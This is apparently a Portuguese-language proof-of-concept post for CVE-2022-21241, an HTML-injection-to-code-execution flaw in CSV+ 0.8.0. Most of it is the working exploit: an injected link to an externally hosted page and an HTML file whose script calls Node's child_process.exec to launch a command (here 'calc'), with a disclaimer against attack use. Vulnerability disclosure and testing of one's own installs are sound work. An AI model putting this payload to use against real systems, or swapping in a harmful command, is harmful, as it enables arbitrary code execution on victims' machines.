
👻 [PoC] CSV+ 0.8.0 - Execução Arbitrária de Código (CVE-2022-21241)
👻 Vulnerabilidade de Execução de Código Arbitrário em 2 Cliques.

CVE-2022-21241
⚠
Este PoC foi criado para alertar usuários e investigar vulnerabilidades em seu próprio CSV+, sendo proibido seu uso para ataques.
As seguintes versões são vulneráveis.
Os atacantes podem executar código arbitrário usando a funcionalidade do Node.js. Eles colocarão o código JS malicioso em algum site e o vincularão a partir de tags com a vulnerabilidade de injeção de HTML no CSV+.

<a href='https://electronooooo.htmlbin.net/xsscalc.html'>click me 👻</a>
https://electronooooo.htmlbin.net/xsscalc.html é um link temporário.
<!DOCTYPE html>
<html>
<head>
<script>
var cmd = "calc";
require("child_process").exec(cmd);
</script>
</head>
<body>
Hi :)
</body>
</html>